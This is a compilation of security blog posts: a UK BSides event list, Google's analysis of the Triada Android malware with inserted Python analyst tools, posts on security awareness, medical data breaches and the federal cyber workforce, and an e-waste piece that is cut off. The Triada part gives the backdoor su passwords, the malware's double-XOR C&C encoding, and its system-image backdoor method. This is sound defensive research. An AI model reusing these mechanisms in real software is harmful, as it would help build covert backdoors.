Some BSides conferences are run in tandem with nearby popular mainstream security conferences, but unlike most mainstream security conferences, BSides agendas are more participation-driven and more collaboration-focused. Any group of security-passionate individuals can organise a BSides event at a city not already covered, under the official Security BSides direction. In recent years, following on from the multi-year success of BSides London, there has been a steady stream of new BSides conferences popping up in the various regions throughout the UK.

Mark Your Calendar & Don't Miss Out
UK BSides events are incredibly popular; they tend to be ticket-only events, with tickets often selling out weeks and sometimes months prior to the event. Below is the current UK Security BSides scene (as of 7th June 2019), so mark your calendar and avoid missing out on these excellent and highly rewarding events.

BSides London
Website: https://www.securitybsides.org.uk/
Twitter: @BSidesLondon
Last Event: 5th June 2019
Next Event: TBC (expected June 2020)

Notes: Annually held since April 2011

BSidesMCR (Manchester)
Website: https://www.bsidesmcr.org.uk/
Twitter: @BSidesMCR
Last Event: 16th August 2018
Next Event: 29th August 2019 (tickets on sale soon)
Notes: Annually held in August since 2014

BSides Liverpool
Twitter: @bsideslivrpool
Next Event: Saturday 29th June 2019 (Sold Out)
Past Event: Inaugural event June 2019

BSides Bristol
Twitter: @bsidesbristol
Next Event: 20th June 2019 (Sold Out)
Past Event: Inaugural event June 2019

BSides Cymru (Wales)
Twitter: @BSidesCymru
Next Event: In Cardiff on 28th September 2019
Past Event: Inaugural event September 2019

BSides Scotland
Twitter: @BSidesScot
Next Event: Expected April 2020
Past Event: at Edinburgh on 23rd April 2019
Notes: Annually held since 2017

BSides Belfast
Twitter: @bsidesbelfast
Next Event: TBC
Past Event: 27th September 2018

BSides Leeds
Twitter: @bsidesleeds
Next Event: TBC
Past Event: 25th January 2019 

PHA Family Highlights: Triada

We continue our PHA family highlights series with the Triada family, which was first discovered early in 2016. The main purpose of Triada apps was to install spam apps on a device that displays ads. The creators of Triada collected revenue from the ads displayed by the spam apps. The methods Triada used were complex and unusual for these types of apps. Triada apps started as rooting trojans, but as Google Play Protect strengthened defenses against rooting exploits, Triada apps were forced to adapt, progressing to a system image backdoor. However, thanks to OEM cooperation and our outreach efforts, OEMs prepared system images with security updates that removed the Triada infection.

History of Triada

Triada was first described in a blog post on the Kaspersky Lab website in March 2016 and in a follow-up blog post in June 2016. Back then, it was a rooting trojan that tried to exploit the device and after getting elevated privileges, it performed a host of different actions. To hide these actions from analysts, Triada used a combination of dynamic code loading and additional app installs. The Kaspersky posts detail the code injection technique used by Triada and provide some statistics on infected devices at the time. In this post, we’ll focus on the peculiar encryption routine and the unusual binary files used by Triada.
Triada’s first action was to install a type of superuser (su) binary file. This su binary allowed other apps on the device to use root permissions. The su binary used by Triada required a password, which made it unusual compared to the regular su binary files common on other Linux systems.
The binary accepted two passwords, od2gf04pd9 and ac32dorbdq. This is illustrated in the IDA screenshot below. Depending on which one was provided, the binary either 1) ran the command given as an argument as root or 2) concatenated all of the arguments, ran that concatenation preceded by sh, then ran them as root. Either way, the app had to know the correct password to run the command as root.
This Triada rooting trojan was mainly used to install apps and display ads. This trojan targeted older devices because the rooting exploits didn’t work on newer ones. Therefore, the trojan implemented a weight watching feature to decide if old apps needed to be deleted to make space for new installs.
Weight watching included several steps and attempted to free up space on the device’s user partition and system partition. Using a blacklist and whitelist of apps it first removed all the apps on its blacklist. If more free space was required it would remove all other apps leaving only the apps on the whitelist. This process freed space while ensuring the apps needed for the phone to function properly were not removed.
Every app on the system partition had a number, or weight, associated with it. The weight was a sum of the number of apps installed on the same date as the app in question and the number of apps signed with the same certificate. The apps with the lowest weight were installed in isolation (that is, not on a day that the device system image was created) and weren’t signed by the OEM or weren’t part of a developer bundle. In the weight watching process, these apps were removed first, until enough space was made for the new app.
su binary accepts two passwords
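The weight watching logic described above, reconstructed as an added example (this is not Triada's code and not Google's; it is written here from the post's description). The app list, dates, signer labels and sizes are constructed. An analyst can use a model like this to predict which preloaded apps an infected device would have lost first, which helps when reconciling an infected device against a clean system image:

```python
from collections import Counter
from dataclasses import dataclass
from typing import Dict, Iterable, List, Set


@dataclass(frozen=True)
class SystemApp:
    package: str
    install_date: str   # date the app landed on the partition, YYYY-MM-DD
    signer: str         # label for the signing certificate
    size_kb: int


def app_weights(apps: Iterable[SystemApp]) -> Dict[str, int]:
    """weight = apps installed on the same date + apps signed with the same
    certificate (each count includes the app itself). Apps baked into the OEM
    image share a build date and the platform cert, so they score high; an app
    dropped in on its own day with its own cert scores lowest."""
    apps = list(apps)
    by_date = Counter(a.install_date for a in apps)
    by_signer = Counter(a.signer for a in apps)
    return {a.package: by_date[a.install_date] + by_signer[a.signer] for a in apps}


def plan_removals(apps: Iterable[SystemApp], blacklist: Set[str],
                  whitelist: Set[str], needed_kb: int) -> List[str]:
    """Packages the weight watching routine would remove, in order.
    Phase 1 drops every blacklisted app. Phase 2 runs only if space is still
    short and removes non-whitelisted apps from the lowest weight upward,
    stopping as soon as enough space has been freed."""
    apps = list(apps)
    weights = app_weights(apps)
    removed: List[str] = []
    freed = 0
    for a in apps:
        if a.package in blacklist:
            removed.append(a.package)
            freed += a.size_kb
    if freed >= needed_kb:
        return removed
    rest = [a for a in apps if a.package not in whitelist and a.package not in removed]
    for a in sorted(rest, key=lambda x: (weights[x.package], x.package)):
        if freed >= needed_kb:
            break
        removed.append(a.package)
        freed += a.size_kb
    return removed


# Constructed sample image: three OEM apps from the build day, a two-app
# vendor bundle, and one isolated app with its own cert.
SAMPLE_IMAGE = [
    SystemApp("com.android.systemui",   "2017-03-01", "oem-platform", 10240),
    SystemApp("com.android.settings",   "2017-03-01", "oem-platform",  8192),
    SystemApp("com.example.oemweather", "2017-03-01", "oem-platform",  6144),
    SystemApp("com.vendor.suite.a",     "2017-04-10", "vendor-y",      5120),
    SystemApp("com.vendor.suite.b",     "2017-04-10", "vendor-y",      4096),
    SystemApp("com.stray.bloat",        "2017-04-11", "vendor-x",      2048),
]
WHITELIST = {"com.android.systemui", "com.android.settings"}
BLACKLIST = {"com.vendor.suite.b"}


if __name__ == "__main__":
    print(app_weights(SAMPLE_IMAGE))
    print(plan_removals(SAMPLE_IMAGE, BLACKLIST, WHITELIST, needed_kb=12000))
```

With the sample image the isolated app scores 2, the vendor bundle 4 each and the OEM apps 6 each, so after the blacklisted app goes, the stray app is the first "legitimate" casualty and the OEM apps survive the longest, exactly the ordering the post describes.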
In addition to installing apps that display ads, Triada injected code into four web browsers: AOSP (com.android.browser), 360 Secure (com.qihoo.browser), Cheetah (com.ijinshan.browser_fast), and Oupeng (com.oupeng.browser). The code was injected using the same technique described in our blog post about the Zen PHA family and in previously mentioned Kaspersky blog posts.
The web browser injection was done to overwrite the URLs and substitute ad banners on websites with ads benefiting the Triada authors.
Triada also used a peculiar and complex communication encryption routine. Whenever it had to send a request to the Command and Control (C&C) server, it encrypted the request using two XOR loops with different passwords. Because of XOR rules, if the passwords had the same character in the same position, those characters weren’t encrypted. The encrypted request was saved to a file, which had the same name as its size. Finally, the file was zipped and sent to the C&C server in the POST request body.
The example below illustrates one such request. The yellow bytes are the zip file’s signature of the central directory file header. The red bytes show the uncompressed file size of 0x0952. The blue bytes show the file name length (4) and the name itself (2386, a decimal version of 0x0952).
09 00 00 50 4B 01 02 14 00 14 00 08 00 08 00 4F ...PK..........O
91 F3 48 AE CF 91 D5 B1 04 00 00 52 09 00 00 04 ..H........R....
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 32 33 38 36 50 4B 05 06 00 00 00 00 01 00 01 .2386PK.........
00 32 00 00 00 E3 04 00 00 00 00 .2.........
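As an added example (not code from the post or from Google), the two observations above turned into something an analyst can run: a parser for the zip central directory entry in the hex dump, which pulls out the uncompressed size and checks the post's tell-tale that the inner file is named after its own size, and the double XOR routine the post describes for both the C&C requests here and the MMD files discussed later, showing that bytes where the two passwords agree are passed through unchanged. The bytes are copied from the dump above; the two keys are constructed, since the post does not give Triada's real ones:

```python
import struct

# Bytes copied from the hex dump in the post: the tail of a zipped Triada
# C&C request body, starting three bytes before the central directory header.
TRIADA_REQUEST_TAIL = bytes.fromhex(
    "09 00 00 50 4B 01 02 14 00 14 00 08 00 08 00 4F"
    "91 F3 48 AE CF 91 D5 B1 04 00 00 52 09 00 00 04"
    "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
    "00 32 33 38 36 50 4B 05 06 00 00 00 00 01 00 01"
    "00 32 00 00 00 E3 04 00 00 00 00"
)

CDFH_SIGNATURE = b"PK\x01\x02"
# Central directory file header: 46 fixed little-endian bytes, then name/extra/comment.
CDFH = struct.Struct("<4sHHHHHHIIIHHHHHII")


def parse_central_directory_entry(blob: bytes) -> dict:
    """Decode the first central directory file header found in blob."""
    pos = blob.find(CDFH_SIGNATURE)
    if pos < 0 or pos + CDFH.size > len(blob):
        raise ValueError("no complete central directory file header in blob")
    (_sig, _made_by, _needed, flags, method, _mtime, _mdate, crc32,
     compressed_size, uncompressed_size, name_len, _extra_len,
     _comment_len, _disk, _iattr, _eattr, _local_offset) = CDFH.unpack_from(blob, pos)
    name_start = pos + CDFH.size
    name = blob[name_start:name_start + name_len].decode("ascii", errors="replace")
    return {
        "name": name,
        "method": method,                      # 8 = deflate
        "flags": flags,
        "crc32": crc32,
        "compressed_size": compressed_size,
        "uncompressed_size": uncompressed_size,
    }


def looks_like_triada_request(blob: bytes) -> bool:
    """Triada named the inner file after its own uncompressed size in decimal."""
    entry = parse_central_directory_entry(blob)
    return entry["name"] == str(entry["uncompressed_size"])


def double_xor(data: bytes, key_a: bytes, key_b: bytes) -> bytes:
    """Two consecutive repeating-key XOR passes. XOR is its own inverse,
    so the same call both encodes and decodes."""
    out = bytearray(data)
    for key in (key_a, key_b):
        for i in range(len(out)):
            out[i] ^= key[i % len(key)]
    return bytes(out)


def passthrough_positions(key_a: bytes, key_b: bytes, length: int) -> list:
    """Offsets where both key bytes are equal: the two passes cancel and the
    plaintext byte is sent as-is, which is why such ciphertext still leaks
    readable fragments of the protocol."""
    return [i for i in range(length)
            if key_a[i % len(key_a)] == key_b[i % len(key_b)]]


# Constructed keys for the demonstration (not Triada's real passwords).
KEY_A = b"k3y-alpha"
KEY_B = b"k3y-bravo"


if __name__ == "__main__":
    entry = parse_central_directory_entry(TRIADA_REQUEST_TAIL)
    print(entry)                                    # name '2386', uncompressed_size 2386
    print(looks_like_triada_request(TRIADA_REQUEST_TAIL))
    plaintext = b"[collect_Head]device=Nexus 5X"
    encoded = double_xor(plaintext, KEY_A, KEY_B)
    print(passthrough_positions(KEY_A, KEY_B, len(plaintext)))
    assert double_xor(encoded, KEY_A, KEY_B) == plaintext
```

Two details worth noting from the parse: the compression method is 8 (deflate) and the general purpose flag has bit 3 set, so the local entry carries a trailing data descriptor, which accounts for the central directory offset in the end-of-central-directory record being 16 bytes beyond the local header plus compressed data. The name-equals-size check is cheap enough to run over proxy captures as a first-pass indicator for this family.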
The underlying data protocol changed periodically. It was either a simple JSON, a list of key-value pairs similar to the properties file, or a proprietary format as shown below.
[collect_Head]device=Nexus 5X
[collect_Space]xadevicekey=xxxxx

[collect_Space]collentmod=opappresultmode
[collect_Space]registerUser=true
[collect_End]
When Triada was discovered, we implemented detection that removed Triada samples from all devices with Google Play Protect. This implementation, combined with the increased security on newer Android devices, made it significantly harder for Triada to infect devices.

When rooting doesn’t work…

During the summer of 2017 we noticed a change in new Triada samples. Instead of rooting the device to obtain elevated privileges, Triada evolved to become a pre-installed Android framework backdoor. The changes to Triada included an additional call in the Android framework log function, demonstrated below with a highlighted configuration string.
LABEL_13:
v18 = -1;
LABEL_18:
j___config_log_println(v7, v6, v10, v11, "cf89450001");
if ( v10 )
This backdoored log function version of Triada was first described by Dr.Web in July 2017. The blog post includes a description of Triada code injection methods.
By backdooring the log function, the additional code executes every time the log method is called (that is, every time any app on the phone tries to log something). These log attempts happen many times per second, so the additional code is running non-stop. The additional code also executes in the context of the app logging a message, so Triada can execute code in any app context. The code injection framework in early versions of Triada worked on Android releases prior to Marshmallow.
The main purpose of the backdoor function was to execute code in another app’s context. The backdoor attempts to execute additional code every time the app needs to log something. Triada developers created a new file format, which we called MMD, based on the file header.
The MMD format was an encrypted version of a DEX file, which was then executed in the app context. The encryption algorithm was a double XOR loop with two different passwords. The format is illustrated below.
Each MMD file had a specific file name of the format <MD5 of the process name>36.jmd. By using the MD5 of the process name, the Triada authors tried to obscure the injection target. However, the pool of all available process names is fairly small, so this hash was easily reversible.
We identified two code injection targets: com.android.systemui (the System UI app) and com.android.vending (the Google Play app). The first target was injected to get the GET_REAL_TASKS permission. This is a signature-level permission, which means that it can’t be held by ordinary Android apps.
Starting with Android Lollipop, the getRecentTasks() method is deprecated to protect users' privacy. However, apps holding the GET_REAL_TASKS permission can get the result of this method call. To hold the GET_REAL_TASKS permission, an app has to be signed with a specific certificate, the device’s platform cert, which is held by the OEM. Triada didn’t have access to this cert. Instead it executed additional code in the System UI app, which has the GET_REAL_TASKS permission.
The injected code returned the app running on top (the activity running in the foreground and being actively used by the device user) to other apps on the device. This app was exposed using two methods: an intent or a socket created for this purpose. When an app on the device sent the intent or wrote to a socket created by Triada’s code injection, it received the package name of the app running on top. Triada used the package name to determine if an ad was displayed. The assumption was that if the app running on top was a browser, the user would expect to see some ads, so Triada displayed ads from the background.
The second injection target was the Google Play app. This injection supported five commands and responses to them. The supported commands are shown below in Chinese, a language that was used throughout the Triada app and injection. English translations are given on the right.
  1. 下载请求 (download request)
  2. 下载结果 (download result)
  3. 安装请求 (install request)
  4. 安装结果 (installation result)
  5. 激活请求 (activation request)
  6. 激活结果 (activation result)
  7. 拉活请求 (pull request)
  8. 拉活结果 (pull the results)
  9. 卸载请求 (uninstall request)
  10. 卸载结果 (uninstall result)
The commands trigger the heartbeat (pull request), download, installation, uninstallation (in the Google Play app context), and activation (the first execution) of the apps. In the Google Play app context, installation meant that Triada didn’t have to turn on installation from unknown sources and all app installs looked like they were from Google Play.
The apps were downloaded from the C&C server and the communication with the C&C was encrypted using the same custom encryption routine using double XOR and zip. The downloaded and installed apps used the package names of unpopular apps available on Google Play. They didn’t have any relation to the apps on Google Play apart from the same package name.
The last piece of the puzzle was the way the backdoor in the log function communicated with the installed apps. This communication prompted the investigation: the change in Triada behavior mentioned at the beginning of this section made it appear that there was another component on the system image. The apps could communicate with the Triada backdoor by logging a line with a specific predefined tag and message.
The reverse communication was more complicated. The backdoor used Java properties to relay a message to the app. These properties were key-value pairs similar to Android system properties, but they were scoped to a specific process. Setting one of these properties in one app context ensures that other apps won’t see this property. Despite that, some versions of Triada indiscriminately created the properties in every single app process.
The diagram below illustrates the communication mechanisms of the Triada backdoor.
Communication mechanisms of Triada

Reverse engineering countermeasures and development

The Triada backdoor was hidden to make the analysis harder. The strings in the Android framework library that related to Triada activities were encrypted, as shown below.
Android framework strings
The strings were encrypted using the algorithm of two XOR loops. However, the first highlighted string, 36.jmd, wasn’t encrypted. This is the MMD file name string mentioned before.
Another anti-analysis measure implemented by the Triada authors was function padding, including additional exported functions that don't serve any purpose apart from making the file size bigger and the function layout more random with every compilation. Four types of these functions are shown in the screenshots below.
Example of function padding
One final interesting feature of Triada worth mentioning is the development cycle. By analyzing subsequent versions of the Triada backdoor (up to 1.5.1) we saw the changes in the code. In the newest version, they substituted MD5 with SHA1. This is used to hash the filenames, which come from a restricted pool of values. The newest version also encrypted the 36.jmd string and introduced changes to the code for compatibility with Android Nougat.
There are also code stubs pointing at the modification of the SystemUI and WebView Android framework elements. We couldn’t find the code that was executed by these modifications, just code stubs suggesting more development in the future.
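The MMD file naming scheme (<hash of the process name>36.jmd, MD5 in the early builds and SHA1 from the newest version) is described earlier in the post as easily reversible because the pool of process names is small. As an added example, not code from Google or the post, here is a small lookup that maps such filenames found on a device image back to the injection target and the hash in use. Only the two injection targets come from the post; the other process names and the sample directory listing are constructed:

```python
import hashlib
import os
from typing import Dict, Iterable, Optional, Tuple

# The two injection targets named in the post, padded with a few other
# common Android process names (constructed for this example).
CANDIDATE_PROCESSES = (
    "com.android.systemui",
    "com.android.vending",
    "com.android.phone",
    "com.android.settings",
    "com.google.android.gms",
)
MMD_SUFFIX = "36.jmd"


def mmd_filename(process: str, algo: str = "md5") -> str:
    """<hash of process name>36.jmd, the naming the post describes
    (MD5 in early builds, SHA1 from version 1.5.1 onward)."""
    return hashlib.new(algo, process.encode("utf-8")).hexdigest() + MMD_SUFFIX


def build_lookup(processes: Iterable[str] = CANDIDATE_PROCESSES,
                 algos: Tuple[str, ...] = ("md5", "sha1")) -> Dict[str, Tuple[str, str]]:
    """Precompute every candidate filename so a scan of a device image can map
    a file back to (target process, hash algorithm) with one dict lookup.
    The pool is tiny, so 'hashing' the target hides nothing."""
    return {mmd_filename(p, a): (p, a) for p in processes for a in algos}


def identify_injection_targets(paths: Iterable[str],
                               lookup: Optional[Dict[str, Tuple[str, str]]] = None
                               ) -> Dict[str, Tuple[str, str]]:
    """Return {path: (target process, algorithm)} for every MMD-style file
    whose name matches a candidate process. Unknown hashes are reported
    separately by the caller if desired; here they are simply skipped."""
    lookup = lookup if lookup is not None else build_lookup()
    hits = {}
    for path in paths:
        name = os.path.basename(path)
        if name.endswith(MMD_SUFFIX) and name in lookup:
            hits[path] = lookup[name]
    return hits


# Constructed directory listing: one MD5-named file, one SHA1-named file,
# an unrelated file, and an MMD-style name whose hash is not in the pool.
SAMPLE_LISTING = [
    "/data/local/tmp/" + mmd_filename("com.android.systemui", "md5"),
    "/data/local/tmp/" + mmd_filename("com.android.vending", "sha1"),
    "/data/local/tmp/cache.bin",
    "/data/local/tmp/" + "0" * 32 + MMD_SUFFIX,
]


if __name__ == "__main__":
    for path, (target, algo) in identify_injection_targets(SAMPLE_LISTING).items():
        print(f"{path}: injection payload for {target} ({algo})")
```

Extending CANDIDATE_PROCESSES with the full package list from a known-good system image (for example the output of the device's package manager) turns this into a complete reverse map for that device, and a hit on a process the post does not mention is itself worth investigating.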

OEM outreach

Triada infects device system images through a third-party during the production process. Sometimes OEMs want to include features that aren’t part of the Android Open Source Project, such as face unlock. The OEM might partner with a third-party that can develop the desired feature and send the whole system image to that vendor for development.
Based on analysis, we believe that a vendor using the name Yehuo or Blazefire infected the returned system image with Triada.
Production process with malicious party
We coordinated with the affected OEMs to provide system updates and remove traces of Triada. We also scan for Triada and similar threats on all Android devices.
OEMs should ensure that all third-party code is reviewed and can be tracked to its source. Additionally, any functionality added to the system image should only support requested features. It’s a good practice to perform a security review of a system image after adding third-party code.

Summary

Triada was inconspicuously included in the system image as third-party code for additional features requested by the OEMs. This highlights the need for thorough ongoing security reviews of system images before the device is sold to the users as well as any time they get updated over-the-air (OTA).
By working with the OEMs and supplying them with instructions for removing the threat from devices, we reduced the spread of preinstalled Triada variants and removed infections from the devices through the OTA updates.
The Triada case is a good example of how Android malware authors are becoming more adept. This case also shows that it’s harder to infect Android devices, especially if the malware author requires privilege elevation.
We are also performing a security review of system images through the Build Test Suite. You can read more about this program in the Android Security 2018 Year in Review report. Triada indicators of compromise are one of many signatures included in the system image scan. Additionally, Google Play Protect continues to track and remove any known versions of Triada and Triada-related apps it detects from user devices.

Security awareness training: a constant in a changing world

There are two schools of thought when it comes to users and cybersecurity. Some people working in the industry think of users as the weakest link. We prefer to see them as the first line of defence. Cybersecurity training programmes can address staff shortcomings in knowledge, promote positive behaviour and equip non-experts with enough information to be able to spot potential threats or scams.

In our previous post, we looked back through the BH Consulting blog archives to trace the evolution of ransomware. This time, we’ve gone digging for a less technical threat. Instead, it’s a constant challenge for any infosec professional: security awareness.

Training shortfall

Back in April 2014, we reported on a survey which found that just 44 per cent of employees received cybersecurity training. David Monahan, research director with Enterprise Management Associates, summed up the issue perfectly:

“Without training, people will click on links in email and release sensitive information in any number of ways. In most cases they don’t realise what they are doing is wrong until a third-party makes them aware of it. In reality, organisations that fail to train their people are doing their business, their personnel and, quite frankly, the Internet as a whole a disservice because their employees not only make poor security decisions at work but also at home on their personal computing devices as well.”

One year later, little had changed. In a post from April 2015, Lee Munson covered a survey by SpectorSoft of 772 IT security professionals. “Not only do many firms have staff who lack even a basic level of security awareness they often, as the report concludes, have poorly trained staff too, with many of the survey respondents citing a lack of expertise as being a significant problem in terms of defending against insider threats.”

Accidents will happen

At least the post acknowledged that damage can sometimes be the result of accidental actions. Too often, security vendors throw around phrases like ‘insider threat’ that, intentionally or not, tar all user actions as malicious.

But could it be that some people are just naturally more susceptible to spilling the beans? Another post from April 2015 reported on a study from Iowa State University that claimed to spot which people are likely to fall for the social engineering tricks that cybercriminals often use. It did this by analysing brainwaves. People with low levels of self-control were more likely to reveal confidential information like company secrets, the researcher observed.

That’s not, admittedly, an approach many companies could take in practice, but it couldn’t hurt to ask some targeted questions at interview stage.

In June of that year, a UK Government survey found that the number of breaches had increased year on year. The findings also showed that more businesses large and small were providing ongoing security awareness training to their staff compared to the previous year. Despite that, many of the organisations surveyed also saw an increase in staff-related security breaches during the same period.

Must try harder

As Lee Munson wrote: “While budgets and technical controls obviously come into play and affect an organisation’s ability to protect its digital assets, the human aspect still appears to be the area requiring the most work. Staff training and awareness programmes are known to be effective but many companies do not appear to have leveraged them to their full potential.”

Another post put the need for cybersecurity training and awareness squarely into perspective. Security company Proofpoint showed the extent to which attackers aim for an organisation’s human resources rather than its technical defences. Its report found that people still click on 4 per cent of malicious links they find in emails. BH Consulting’s regular blogger Lee Munson found this to be a surprisingly high figure. “Attackers employ psychology to improve the chances of their attacks succeeding,” he wrote.

And if at first you don’t succeed? A post from early in 2016 suggested a radical approach to poor security behaviour: disciplinary measures. The blog quoted a survey by Nuix which determined that human behaviour was the biggest threat to an organisation’s security. It said corporations would tolerate risky behaviour less, and would likely penalise staff who “invite a data breach”. That’s one way to “encourage” people to show better security behaviour.

Communication breakdown

Lee rightly raised the question of whether companies have sufficiently communicated their security policies and procedures in the first place. “So, if companies (including yours) are going to penalise employees for not being up to date on all of their security policies, who is going to police the writing and dissemination of those documents in the first place?”

The message is that security policies need to be clear, so that even a non-technical member of staff can:

  • Understand them
  • Act on them
  • Remember them.

Taken as a whole, the blogs show that while cybersecurity training is a valuable exercise, it’s got to be delivered in a way that the intended audience will understand.

The post Security awareness training: a constant in a changing world appeared first on BH Consulting.

4 Tips to Protect Your Information During Medical Data Breaches

As the companies we trust with our data become more digital, it’s important for users to realize how this affects their own cybersecurity. Take your medical care provider, for instance. You walk into a doctor’s office and fill out a form on a clipboard. This information is then transferred to a computer where a patient Electronic Health Record is created or added to. We trust that our healthcare provider has taken the proper precautions to safely store this data. Unfortunately, medical data breaches are on the rise with a 70% increase over the past seven years. In fact, medical testing company LabCorp just announced that it experienced a breach affecting approximately 7.7 million customers.

How exactly did this breach occur? The information was exposed as a result of an issue with a third-party billing collections vendor, American Medical Collection Agency (AMCA). The information exposed includes names, addresses, birth dates, balance information, and credit card or bank account information provided by customers to AMCA. This breach comes just a few days after Quest Diagnostics, another company that worked with AMCA, announced that it too had experienced a breach, affecting 11.9 million users.

Luckily, LabCorp stated that it does not store or maintain Social Security numbers or insurance information for its customers. Additionally, the company provided no ordered tests, lab results, or diagnostic information to AMCA. LabCorp stated that it intends to provide 200,000 affected users with more specific information regarding the breach and to offer them identity protection and credit monitoring services for two years. After receiving information on the possible security compromise, AMCA took down its web payments page and hired an external forensics firm to investigate the situation.

Medical data is essentially nonperishable in nature, making it extremely valuable to cybercrooks. It turns out that quite a few security vulnerabilities exist in the healthcare industry, such as unencrypted traffic between servers, the ability to create admin accounts remotely, and disclosure of private information. These types of vulnerabilities could allow cybercriminals to access healthcare systems, as our McAfee Labs researchers discovered. If someone with malicious intent did access the system, they would have the ability to permanently alter medical images, use medical research data for extortion, and more.

Cybercriminals are constantly pivoting their tactics and changing their targets in order to best complete their schemes. As it turns out, medical data has become a hot commodity for cybercrooks. According to the McAfee Labs Threats Report from March 2018, the healthcare sector has experienced a 210% increase in publicly disclosed security incidents from 2016 to 2017. The McAfee Advanced Threat Research Team concluded that many of the incidents were caused by failures to comply with security best practices or to address vulnerabilities in medical software.

While medical care providers should do all that they can to ensure the security of their patients, there are steps users can take to help maintain their privacy. If you think your personal or financial information might be affected by the recent breaches, check out the following tips to help keep your personal data secure:

  • Place a fraud alert. If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Freeze your credit. Freezing your credit will make it impossible for criminals to take out loans or open up new accounts in your name. To do this effectively, you will need to freeze your credit at each of the three major credit-reporting agencies (Equifax, TransUnion, and Experian).
  • Consider using identity theft protection. A solution like McAfee Identity Theft Protection will help you to monitor your accounts, alert you of any suspicious activity, and help you to regain any losses in case something goes wrong.
  • Be vigilant about checking your accounts. If you suspect that your personal data has been compromised, frequently check your bank account and credit activity. Many banks and credit card companies offer free alerts that notify you via email or text message when new purchases are made, if there’s an unusual charge, or when your account balance drops to a certain level. This will help you stop fraudulent activity in its tracks.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post 4 Tips to Protect Your Information During Medical Data Breaches appeared first on McAfee Blogs.

A Robust Federal Cybersecurity Workforce Is Key To Our National Security

The Federal government has long struggled to close the cybersecurity workforce gap. The problem has continued to get worse as the number of threats against our networks, critical infrastructure, intellectual property, and the millions of IoT devices we use in our homes, offices and on our infrastructure increases. Without a robust cyber workforce, federal agencies will continue to struggle to develop and execute the policies needed to combat these ongoing issues.

The recent executive order on developing the nation’s cybersecurity workforce was a key step to closing that gap and shoring up the nation’s cyber posture. The widespread adoption of the cybersecurity workforce framework by NIST, the development of a rotational program for Federal employees to expand their cybersecurity expertise and the “president’s cup” competition are all crucial to retaining and growing the federal cyber workforce. If we are to get serious about closing the federal workforce gap, we have to encourage our current professionals to stay in the federal service and grow their expertise to defend against the threats of today and prepare for the threats of tomorrow.

Further, we must do more to bring individuals into the field by eliminating barriers to entry and increasing the educational opportunities available, so that there can be a strong, diverse and growing cybersecurity workforce in both the federal government and the private sector. Expanding scholarship programs through the National Science Foundation (NSF) and Department of Homeland Security (DHS) for students who agree to work for federal and state agencies will go a long way toward bringing new, diverse individuals into the industry. Additionally, these programs should be expanded to include many types of educational institutions, including community colleges. Community colleges attract a different type of student than a 4-year institution, increasing diversity within the federal workforce while also tapping into a currently unused pipeline for cyber talent.

The administration’s prioritization of this issue is a positive step forward, and there has been progress made on closing the cyber skills gap in the U.S., but there is still work to be done. If we want to create a robust, diverse cyber workforce, the private sector, lawmakers and the administration must work together to come up with innovative solutions that build upon the recent executive order.

The post A Robust Federal Cybersecurity Workforce Is Key To Our National Security appeared first on McAfee Blogs.

What You Can Do to Reduce Your E-Waste This World Environment Day

Our love of technology and often biological need for new devices has created one of the biggest environmental issues of our time – e-waste. Today is World Environment Day – a great opportunity to ensure we are doing all we can to minimise landfill and protect our precious environment.

Over the last 12 months, BYO shopping bags, paper straws and ‘truly recyclable’ takeaway coffee cups have dominated our national environmental dialogue as essential ways to minimise future landfill. But with the average Aussie family generating a whopping 73 kg per year of e-waste, it’s critical that we turn our attention to our growing e-waste crisis this World Environment Day.

What is e-Waste?

E-Waste refers to old technology that you are no longer using. It includes microwaves, computers, TVs, batteries, screens, chargers, printer cartridges and even kitchen appliances.

High amounts of non-renewable resources such as plastic and precious metals (gold, silver, platinum, nickel, zinc, copper and aluminium) are found in e-waste. So, recycling these materials to make new electronics not only makes good financial sense but it also prevents products from winding up in a landfill.

According to experts, the average Aussie household owns a startling 17 devices, with predictions that this will increase to 27 by 2022. So, it’s clear that our e-waste problem needs to be tackled head-on.

How Much e-Waste Is Generated Annually?

In January, the United Nations and World Economic Forum reported that the world produces 50 million tonnes of e-waste a year – around the same mass as 125,000 jumbo jets, which is more than all the commercial aircraft ever built!

But interestingly, e-waste isn’t all bad news. In 2017, the UN University estimated the value of raw materials in e-waste to be worth $US62.5 billion annually, which exceeds the GDP (gross domestic product) of 123 countries. So, the opportunities contained in effective e-waste management are not only environmental but financial, as economies could be bolstered and jobs could be created.

What Can We Do to Minimise It?

There are definitely steps we can all take to reduce our e-waste. While the obvious (less popular) strategy is to STOP purchasing new electronics, focusing on recycling and repurposing will go a long way to reducing our e-waste footprint. Here are my top tips:

  1. Repair or Refresh Your Current Devices

While we all love the idea of a shiny, new device, it’s often possible to repair or rejuvenate devices to avoid spending big bucks on a new one. Most devices can usually be repaired and even enhanced with a little expert ‘know-how’. I have spent a large chunk of my parenting career repairing and rescuing smartphones that were dropped, ‘washed’ or just deemed not ‘cool enough’. But the good news is that it doesn’t take much to fix these issues: screens can be replaced, faults can be rectified, and new covers can be purchased to re-energise ‘the look’. And don’t forget the power of a software upgrade to ensure your phone is operating at its peak performance. If you are an Apple user, why not book a visit to their Genius Bar and let their staff show you how to get your device working at its optimum level?

  2. Sell or Give Away Your Unwanted Electronics

One of the easiest ways to manage your unwanted electronic devices is to rehome them. Gumtree and eBay are great online marketplaces to make a bit of extra cash by selling your obsolete devices. I know my boys have taken great delight in making a few extra bucks selling old phones and iPads over the years. Many char